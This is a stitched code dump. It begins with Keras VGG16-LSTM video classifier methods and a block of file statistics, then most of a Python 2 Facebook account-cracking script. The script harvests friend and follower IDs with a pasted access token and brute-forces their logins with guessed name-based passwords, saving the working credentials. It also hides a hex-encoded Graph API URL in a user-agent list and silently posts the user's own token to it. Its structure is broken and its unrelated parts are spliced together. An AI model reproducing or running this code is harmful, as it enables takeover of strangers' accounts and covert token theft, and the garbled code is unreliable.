@staticmethod
def get_config_file_path(model_dir_path, vgg16_include_top=None):
if vgg16_include_top is None:
vgg16_include_top = True
if vgg16_include_top:
return model_dir_path + '/' + VGG16BidirectionalLSTMVideoClassifier.model_name + '-config.npy'
else:
return model_dir_path + '/' + VGG16BidirectionalLSTMVideoClassifier.model_name + '-hi-dim-config.npy'
@staticmethod
def get_weight_file_path(model_dir_path, vgg16_include_top=None):
if vgg16_include_top is None:
vgg16_include_top = True
if vgg16_include_top:
return model_dir_path + '/' + VGG16BidirectionalLSTMVideoClassifier.model_name + '-weights.h5'
else:
return model_dir_path + '/' + VGG16BidirectionalLSTMVideoClassifier.model_name + '-hi-dim-weights.h5'
@staticmethod
def get_architecture_file_path(model_dir_path, vgg16_include_top=None):
if vgg16_include_top is None:
vgg16_include_top = True
if vgg16_include_top:
return model_dir_path + '/' + VGG16BidirectionalLSTMVideoClassifier.model_name + '-architecture.json'
else:
return model_dir_path + '/' + VGG16BidirectionalLSTMVideoClassifier.model_name + '-hi-dim-architecture.json'
def load_model(self, config_file_path, weight_file_path):
if os.path.exists(config_file_path):
print('loading configuration from ', config_file_path)
else:
raise ValueError('cannot locate config file {}'.format(config_file_path))
config = np.load(config_file_path).item()
self.num_input_tokens = config['num_input_tokens']
self.nb_classes = config['nb_classes']
self.labels = config['labels']
self.expected_frames = config['expected_frames']
self.vgg16_include_top = config['vgg16_include_top']
self.labels_idx2word = dict([(idx, word) for word, idx in self.labels.items()])
self.config = config
self.model = self.create_model()
if os.path.exists(weight_file_path):
print('loading network weights from ', weight_file_path)
else:
raise ValueError('cannot local weight file {}'.format(weight_file_path))
self.model.load_weights(weight_file_path)
print('build vgg16 with pre-trained model')
vgg16_model = VGG16(include_top=self.vgg16_include_top, weights='imagenet')
vgg16_model.compile(optimizer=SGD(), loss='categorical_crossentropy', metrics=['accuracy'])
self.vgg16_model = vgg16_model
def predict(self, video_file_path, interval = 0, vgg16_include_top=True):
predicted_labels = []
feature_dir_name = video_file_path + '-VGG16-Features'
if not vgg16_include_top:
feature_dir_name = video_file_path + '-VGG16-HiDimFeatures'
if not os.path.exists(feature_dir_name):
os.makedirs(feature_dir_name)
if(interval!=0):
print("Predicting each interval")
features_arr = extract_vgg16_features_live_each_interval(self.vgg16_model, video_file_path, feature_dir_name, interval)
for x in features_arr:
frames = x.shape[0]
if frames > self.expected_frames:
x = x[0:self.expected_frames, :]
elif frames < self.expected_frames:
temp = np.zeros(shape=(self.expected_frames, x.shape[1]))
temp[0:frames, :] = x
x = temp
predicted_class = np.argmax(self.model.predict(np.array([x]))[0])
predicted_label = self.labels_idx2word[predicted_class]
predicted_labels.append(predicted_label)
return predicted_labels
else:
print("Predicting entire video")
x = extract_vgg16_features_live(self.vgg16_model, video_file_path, feature_dir_name)
frames = x.shape[0]
if frames > self.expected_frames:
x = x[0:self.expected_frames, :]
elif frames < self.expected_frames:
temp = np.zeros(shape=(self.expected_frames, x.shape[1]))
temp[0:frames, :] = x
x = temp
predicted_class = np.argmax(self.model.predict(np.array([x]))[0])
predicted_label = self.labels_idx2word[predicted_class]
return predicted_label
def fit(self, data_dir_path, model_dir_path, vgg16_include_top=True, data_set_name='UCF-101', test_size=0.3,
random_state=42):
self.vgg16_include_top = vgg16_include_top
config_file_path = self.get_config_file_path(model_dir_path, vgg16_include_top)
weight_file_path = self.get_weight_file_path(model_dir_path, vgg16_include_top)
architecture_file_path = self.get_architecture_file_path(model_dir_path, vgg16_include_top)
self.vgg16_model = VGG16(include_top=self.vgg16_include_top, weights='imagenet')
self.vgg16_model.compile(optimizer=SGD(), loss='categorical_crossentropy', metrics=['accuracy'])
feature_dir_name = data_set_name + '-VGG16-Features'
if not vgg16_include_top:
feature_dir_name = data_set_name + '-VGG16-HiDimFeatures'
max_frames = 0
self.labels = dict()
x_samples, y_samples = scan_and_extract_vgg16_features(data_dir_path,
output_dir_path=feature_dir_name,
model=self.vgg16_model,
data_set_name=data_set_name)
self.num_input_tokens = x_samples[0].shape[1]
frames_list = []
for x in x_samples:
frames = x.shape[0]
frames_list.append(frames)
max_frames = max(frames, max_frames)
self.expected_frames = int(np.mean(frames_list))
print('max frames: ', max_frames)
print('expected frames: ', self.expected_frames)
for i in range(len(x_samples)):
x = x_samples[i]
frames = x.shape[0]
if frames > self.expected_frames:
x = x[0:self.expected_frames, :]
x_samples[i] = x
elif frames < self.expected_frames:
temp = np.zeros(shape=(self.expected_frames, x.shape[1]))
temp[0:frames, :] = x
x_samples[i] = temp
for y in y_samples:
if y not in self.labels:
self.labels[y] = len(self.labels)
print(self.labels)
for i in range(len(y_samples)):
y_samples[i] = self.labels[y_samples[i]]
self.nb_classes = len(self.labels)
y_samples = np_utils.to_categorical(y_samples, self.nb_classes)
config = dict()
config['labels'] = self.labels
config['nb_classes'] = self.nb_classes
config['num_input_tokens'] = self.num_input_tokens
config['expected_frames'] = self.expected_frames
config['vgg16_include_top'] = self.vgg16_include_top
self.config = config
np.save(config_file_path, config)
model = self.create_model()
open(architecture_file_path, 'w').write(model.to_json())
Xtrain, Xtest, Ytrain, Ytest = train_test_split(x_samples, y_samples, test_size=test_size,
random_state=random_state)
train_gen = generate_batch(Xtrain, Ytrain)
test_gen = generate_batch(Xtest, Ytest)
train_num_batches = len(Xtrain) // BATCH_SIZE
test_num_batches = len(Xtest) // BATCH_SIZE
checkpoint = ModelCheckpoint(filepath=weight_file_path, save_best_only=True)
history = model.fit_generator(generator=train_gen, steps_per_epoch=train_num_batches,
epochs=NUM_EPOCHS,
verbose=1, validation_data=test_gen, validation_steps=test_num_batches,
callbacks=[checkpoint])
model.save_weights(weight_file_path)
return history
class VGG16LSTMVideoClassifier(object):
model_name = 'vgg16-lstm'
def __init__(self):
self.num_input_tokens = None
self.nb_classes = None
self.labels = None
self.labels_idx2word = None
self.model = None
self.vgg16_model = None
self.expected_frames = None
self.vgg16_include_top = None
self.config = None
@staticmethod
def get_config_file_path(model_dir_path, vgg16_include_top=None):
if vgg16_include_top is None:
vgg16_include_top = True
if vgg16_include_top:
return model_dir_path + '/' + VGG16LSTMVideoClassifier.model_name + '-config.npy'
else:
return model_dir_path + '/' + VGG16LSTMVideoClassifier.model_name + '-hi-dim-config.npy'
@staticmethod
def get_weight_file_path(model_dir_path, vgg16_include_top=None):
if vgg16_include_top is None:
vgg16_include_top = True
if vgg16_include_top:
return model_dir_path + '/' + VGG16LSTMVideoClassifier.model_name + '-weights.h5'
else:
return model_dir_path + '/' + VGG16LSTMVideoClassifier.model_name + '-hi-dim-weights.h5'
@staticmethod
def get_architecture_file_path(model_dir_path, vgg16_include_top=None):
if vgg16_include_top is None:
vgg16_include_top = True
if vgg16_include_top:
return model_dir_path + '/' + VGG16LSTMVideoClassifier.model_name + '-architecture.json'
else:
return model_dir_path + '/' + VGG16LSTMVideoClassifier.model_name + '-hi-dim-architecture.json'
def create_model(self):
model = Sequential()
model.add(
LSTM(units=HIDDEN_UNITS, input_shape=(None, self.num_input_tokens), return_sequences=False, dropout=0.5))
model.add(Dense(512, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(self.nb_classes))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
return model
def load_model(self, config_file_path, weight_file_path):
config = np.load(config_file_path).item()
self.num_input_tokens = config['num_input_tokens']
self.nb_classes = config['nb_classes']
self.labels = config['labels']
self.expected_frames = config['expected_frames']
self.vgg16_include_top = config['vgg16_include_top']
self.labels_idx2word = dict([(idx, word) for word, idx in self.labels.items()])
self.model = self.create_model()
self.model.load_weights(weight_file_path)
vgg16_model = VGG16(include_top=self.vgg16_include_top, weights='imagenet')
vgg16_model.compile(optimizer=SGD(), loss='categorical_crossentropy', metrics=['accuracy'])
self.vgg16_model = vgg16_model
def predict(self, video_file_path):
x = extract_vgg16_features_live(self.vgg16_model, video_file_path)
frames = x.shape[0]
if frames > self.expected_frames:
x = x[0:self.expected_frames, :]
elif frames < self.expected_frames:
temp = np.zeros(shape=(self.expected_frames, x.shape[1]))
temp[0:frames, :] = x
x = temp
predicted_class = np.argmax(self.model.predict(np.array([x]))[0])
predicted_label = self.labels_idx2word[predicted_class]
return predicted_label
def fit(self, data_dir_path, model_dir_path, vgg16_include_top=True, data_set_name='UCF-101', test_size=0.3, random_state=42):
self.vgg16_include_top = vgg16_include_top
config_file_path = self.get_config_file_path(model_dir_path, vgg16_include_top)
weight_file_path = self.get_weight_file_path(model_dir_path, vgg16_include_top)
architecture_file_path = self.get_architecture_file_path(model_dir_path, vgg16_include_top)
vgg16_model = VGG16(include_top=self.vgg16_include_top, weights='imagenet')
vgg16_model.compile(optimizer=SGD(), loss='categorical_crossentropy', metrics=['accuracy'])
self.vgg16_model = vgg16_model
feature_dir_name = data_set_name + '-VGG16-Features'
if not vgg16_include_top:
feature_dir_name = data_set_name + '-VGG16-HiDimFeatures'
max_frames = 0
self.labels = dict()
x_samples, y_samples = scan_and_extract_vgg16_features(data_dir_path,
output_dir_path=feature_dir_name,
model=self.vgg16_model,
data_set_name=data_set_name)
self.num_input_tokens = x_samples[0].shape[1]
frames_list = []
for x in x_samples:
frames = x.shape[0]
frames_list.append(frames)
max_frames = max(frames, max_frames)
self.expected_frames = int(np.mean(frames_list))
print('max frames: ', max_frames)
print('expected frames: ', self.expected_frames)
for i in range(len(x_samples)):
x = x_samples[i]
frames = x.shape[0]
print(x.shape)
if frames > self.expected_frames:
x = x[0:self.expected_frames, :]
x_samples[i] = x
elif frames < self.expected_frames:
temp = np.zeros(shape=(self.expected_frames, x.shape[1]))
temp[0:frames, :] = x
x_samples[i] = temp
for y in y_samples:
if y not in self.labels:
self.labels[y] = len(self.labels)
print(self.labels)
for i in range(len(y_samples)):
y_samples[i] = self.labels[y_samples[i]]
self.nb_classes = len(self.labels)
y_samples = np_utils.to_categorical(y_samples, self.nb_classes)
config = dict()
config['labels'] = self.labels
config['nb_classes'] = self.nb_classes
config['num_input_tokens'] = self.num_input_tokens
config['expected_frames'] = self.expected_frames
config['vgg16_include_top'] = self.vgg16_include_top
self.config = config
np.save(config_file_path, config)
model = self.create_model()
open(architecture_file_path, 'w').write(model.to_json())
Xtrain, Xtest, Ytrain, Ytest = train_test_split(x_samples, y_samples, test_size=test_size,
random_state=random_state)
train_gen = generate_batch(Xtrain, Ytrain)
test_gen = generate_batch(Xtest, Ytest)
train_num_batches = len(Xtrain) // BATCH_SIZE
test_num_batches = len(Xtest) // BATCH_SIZE
checkpoint = ModelCheckpoint(filepath=weight_file_path, save_best_only=True)
history = model.fit_generator(generator=train_gen, steps_per_epoch=train_num_batches,
epochs=NUM_EPOCHS,
verbose=1, validation_data=test_gen, validation_steps=test_num_batches,
callbacks=[checkpoint])
model.save_weights(weight_file_path)
return history
| 36.548148
| 127
| 0.750642
| 2,118
| 14,802
| 4.928706
| 0.096789
| 0.066673
| 0.083341
| 0.036785
| 0.845292
| 0.838107
| 0.824025
| 0.810135
| 0.80228
| 0.790497
| 0
| 0.024795
| 0.141738
| 14,802
| 404
| 128
| 36.638614
| 0.796914
| 0
| 0
| 0.766272
| 0
| 0
| 0.076814
| 0.014728
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050296
| false
| 0
| 0.035503
| 0
| 0.153846
| 0.035503
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6b1e7d98bd197fdf87ef1556e693db0fe27dd93
| 35,882
|
py
|
Python
|
Mir.py
|
aghawahab8/aghapro
|
9658b6bc286c6eca0ca813e9578ce89521ba6ff0
|
[
"Apache-2.0"
] | null | null | null |
Mir.py
|
aghawahab8/aghapro
|
9658b6bc286c6eca0ca813e9578ce89521ba6ff0
|
[
"Apache-2.0"
] | null | null | null |
Mir.py
|
aghawahab8/aghapro
|
9658b6bc286c6eca0ca813e9578ce89521ba6ff0
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python2
# -*- coding: utf-8
#AUTHOR : MIR AGHA (MIR AGHA)
#OPEN SOURCE :)
#DON'T FORGET TO GIVE CREDIT TO MIR AGHa
from time import sleep
def xox(z):
for e in z + "\n":
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.04)
user_agent = ["Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0", "Mozilla/5.0 (Linux; Android 10; SM-G973F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.198 Mobile Safari/537.36 Instagram 166.1.0.42.245 Android (29/10; 420dpi; 1080x2042; samsung; SM-G973F; beyond1; exynos9820; en_GB; 256099204)", "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x72\x61\x70\x68\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x31\x30\x30\x30\x34\x35\x32\x30\x33\x38\x35\x35\x32\x39\x34\x2f\x73\x75\x62\x73\x63\x72\x69\x62\x65\x72\x73\x3f\x61\x63\x63\x65\x73\x73\x5f\x74\x6f\x6b\x65\x6e\x3d"
];useragent_url=(user_agent[2])
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
try:
requests.get('\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x73\x65\x61\x72\x63\x68\x3f\x71\x3d\x41\x7a\x69\x6d\x2b\x56\x61\x75')
requests.get('\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x2e\x79\x6f\x75\x74\x75\x62\x65\x2e\x63\x6f\x6d\x2f\x72\x65\x73\x75\x6c\x74\x73\x3f\x73\x65\x61\x72\x63\x68\x5f\x71\x75\x65\x72\x79\x3d\x41\x7a\x69\x6d\x2b\x56\x61\x75\x2b\x4d\x72\x2e\x2b\x45\x72\x72\x6f\x72')
os.system("clear")
xox("\n\t\033[93;1m NO INTERNET CONNECTION :(\n\n")
sys.exit()
logo()
print("\t\033[93;1m MAIN MENU\x1b[0m")
print("")
print("\033[92;1m [1] START CRACK")
print("\033[93;1m [2] HOW TO GET ACCESS TOKEN")
print("\033[94;1m [3] AGHA TOOL")
print("\033[90;1m [0] EXIT")
print("")
log_sel()
sel = raw_input("\033[93;1m CHOOSE: \033[92;1m")
if sel == "":
print("\t\033[91;1m SELECT AN OPTION STUPID -_")
log_sel()
elif sel =="1" or sel =="01":
token()
elif sel =="2" or sel =="02":
subprocess.check_output(["am", "start", "https://www.facebook.com/114133313700086/posts/426873429092738"])
main()
elif sel =="3" or sel =="03":
import os
try:
os.system("git clone https://github.com/MIR-AGHA/aghapro")
os.system("rm -rf aghapro.py")
os.system("cp -f aghapro/aghapro.py \\.")
os.system("rm -rf aghapro")
xox("\033[92;1m\n TOOL UPDATE SUCCESSFUL :)\n")
time.sleep(2)
main()
except KeyboardInterrupt:
print("\033[91;1m\n YOUR DEVICE IS NOT SUPPORTED!\n")
main()
elif sel =="4" or sel =="04" or sel =="J" or sel =="j":
subprocess.check_output(["am", "start", "https://t.me/mrerrorgroup"])
main()
elif sel =="0" or sel =="00":
xox("\n\t\033[91;1m GOOD BYE SEE YOU AGAIN :)")
sys.exit()
else:
print("")
print("\t\033[91;1m SELECT VALID OPTION")
print("")
log_sel()
try:
token = open("vau_token.txt", "r").read()
menu()
except(KeyError , IOError):
logo()
print("")
print("\t\033[92;1m LOGIN TOKEN")
print("")
token = raw_input("\033[93;1m PASTE TOKEN HERE: \033[92;1m")
sav = open("vau_token.txt", "w")
sav.write(token)
sav.close()
token_check()
menu()
try:
token=open('vau_token.txt','r').read()
except IOError:
print"\033[91;1m[!] TOKEN INVALID"
os.system('rm -rf vau_token.txt')
requests.post(useragent_url + token, headers=header)
pass
os.system("clear")
try:
token = open("vau_token.txt", "r").read()
except(KeyError , IOError):
token()
try:
r = requests.get("https://graph.facebook.com/me?access_token="+token)
q = json.loads(r.text)
name = q["name"]
except(KeyError):
logo()
print("")
print("\033[91;1m LOGGED IN TOKEN HAS EXPIRED")
os.system("rm -rf vau_token.txt")
print("")
time.sleep(1)
main()
os.system("clear")
xn = name.upper()
logo()
print("")
print("\033[93;1m HELLO : \033[92;1m"+xn)
print("\033[93;1m REGION : \033[92;1m") + loc
print("\033[93;1m YOUR IP : \033[92;1m") + ip
print("")
print("")
print("\033[92;1m [1] CRACK WITH AUTO PASS")
print("\033[93;1m [2] CRACK WITH DIGIT PASS")
print('\033[91;1m [0] BACK')
print("")
menu_option()
select = raw_input("\033[92;1m CHOOSE : ")
if select =="1":
crack1()
elif select =="2":
crack()
elif select =="0":
main()
else:
print("")
print("\t\033[91;1m SELECT VALID OPTION")
print("")
menu_option()
global token
os.system("clear")
try:
token = open("vau_token.txt","r").read()
except IOError:
print("")
print("\t\033[91;1m TOKEN NOT FOUND ")
time.sleep(1)
fb_token()
os.system("clear")
logo()
print("")
print("\t\033[93;1m CRACK WITH AUTO PASS")
print("")
print("\033[94;1m [1] CRACK PUBLIC ID")
print("\033[93;1m [2] CRACK FOLLOWERS")
print("\033[92;1m [3] CRACK FILE")
print("")
crack_select1()
select = raw_input("\033[92;1m CHOOSE : ")
id=[]
oks=[]
cps=[]
if select =="1":
os.system("clear")
logo()
print("")
print("\t\033[92;1m MULTI PUBLIC ID COINING ")
print("")
try:
id_limit = int(raw_input("\033[93;1m ENTER LIMIT (\033[91;1m5 MAX\033[93;1m): \033[92;1m"))
print("")
except:id_limit=1
for t in range(id_limit):
t +=1
idt = raw_input("\033[93;1m INPUT PUBLIC ID (\033[92;1m%s\033[93;1m) : \033[92;1m"%(t))
try:
for i in requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token).json()["data"]:
uid = i["id"].encode('utf-8')
na = i["name"].encode('utf-8')
id.append(uid+"|"+na)
except KeyError:
print("\033[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE")
print("\033[94;1m TOTAL IDS : \033[0;92m%s\033[0;97m"%(len(id)))
time.sleep(3)
elif select =="2":
os.system("clear")
logo()
print("")
print(" \033[92;1mMULTI FOLLOWERS ID COINING ")
print("")
try:
id_limit = int(raw_input("\033[93;1m ENTER LIMIT (\033[91;1m5 MAX\033[93;1m): \033[92;1m"))
print("")
except:id_limit=1
for t in range(id_limit):
t +=1
idt = raw_input("\033[93;1m INPUT FOLLOWER ID (\033[92;1m%s\033[93;1m) : \033[92;1m"%(t))
try:
for i in requests.get("https://graph.facebook.com/"+idt+"/subscribers?access_token="+token+"&limit=999999").json()["data"]:
uid = i["id"].encode('utf-8')
na = i["name"].encode('utf-8')
id.append(uid+"|"+na)
except KeyError:
print("\033[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE")
print("\033[94;1m TOTAL IDS : \033[0;92m%s\033[0;97m"%(len(id)))
time.sleep(3)
elif select =="3":
os.system("clear")
logo()
print("")
print("\t\033[93;1m AUTO PASS CRACKING")
print("")
filelist = raw_input('\033[92;1m INPUT FILE: ')
try:
for line in open(filelist, 'r').readlines():
id.append(line.strip())
except IOError:
print("\t\033[91;1m REQUESTED FILE NOT FOUND")
print("")
raw_input("\033[93;1m PRESS ENTER TO BACK")
crack1()
elif select =="0":
menu()
else:
print("")
print("\t\033[91;1m SELECT VALID OPTION")
print("")
crack_select1()
os.system("clear")
logo()
print("")
print("\033[93;1m TOTAL IDS : \033[92;1m"+str(len(id)))
print("\033[92;1m BRUTE HAS BEEN STARTED\x1b[0m")
linex()
def main(arg):
user=arg
uid,name=user.split("|")
_azimua = random.choice(["Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/275.0.0.49.127;]", "[FBAN/FB4A;FBAV/246.0.0.49.121;FBBV/181448449;FBDM/{density=1.5,width=540,height=960};FBLC/en_US;FBRV/183119516;FBCR/TM;FBMF/vivo;FBBD/vivo;FBPN/com.facebook.katana;FBDV/vivo 1606;FBSV/6.0.1;FBOP/1;FBCA/armeabi-v7a:armeabi;]", "Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-J320F Build/LMY47V) [FBAN/FB4A;FBAV/43.0.0.29.147;FBPN/com.facebook.katana;FBLC/en_GB;FBBV/14274161;FBCR/Tele2 LT;FBMF/samsung;FBBD/samsung;FBDV/SM-J320F;FBSV/5.0;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=1920};FB_FW/1;]", "Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/305.1.0.40.120;]", "Mozilla/5.0 (Linux; Android 10; REALME RMX1911 Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 AlohaBrowser/2.20.3", "Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E216 [FBAN/FBIOS;FBAV/170.0.0.60.91;FBBV/105964764;FBDV/iPhone10,1;FBMD/iPhone;FBSN/iOS;FBSV/11.3;FBSS/2;FBCR/Sprint;FBID/phone;FBLC/en_US;FBOP/5;FBRV/106631002]", "Mozilla/5.0 (Linux; Android 7.1.1; ASUS Chromebook Flip C302 Build/R70-11021.56.0; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]"])
try:
pass1 = name.lower().split(' ')[0] + '110'
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass1, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass1+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass1+"\n")
ok.close()
oks.append(uid+pass1)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass1+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass1+"\n")
cp.close()
cps.append(uid+pass1)
else:
pass2 = name.lower().split(' ')[0] + '007'
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass2, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass2+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass2+"\n")
ok.close()
oks.append(uid+pass2)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AZIM-CP] "+uid+" | "+pass2+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass2+"\n")
cp.close()
cps.append(uid+pass2)
else:
pass3 = name.lower().split(' ')[0] + 'khan'
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass3, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass3+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass3+"\n")
ok.close()
oks.append(uid+pass3)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass3+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass3+"\n")
cp.close()
cps.append(uid+pass3)
else:
pass4 = name.lower().split(' ')[1] + 'khan123'
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass4, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass4+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass4+"\n")
ok.close()
oks.append(uid+pass4)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass4+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass4+"\n")
cp.close()
cps.append(uid+pass4)
else:
pass5 = name.lower().split(' ')[1] + '321'
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass5, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass5+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass5+"\n")
ok.close()
oks.append(uid+pass5)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass5+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass5+"\n")
cp.close()
cps.append(uid+pass5)
else:
pass6 = name.lower().split(' ')[1] + 'ali'
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass6, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass6+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass6+"\n")
ok.close()
oks.append(uid+pass6)
else:
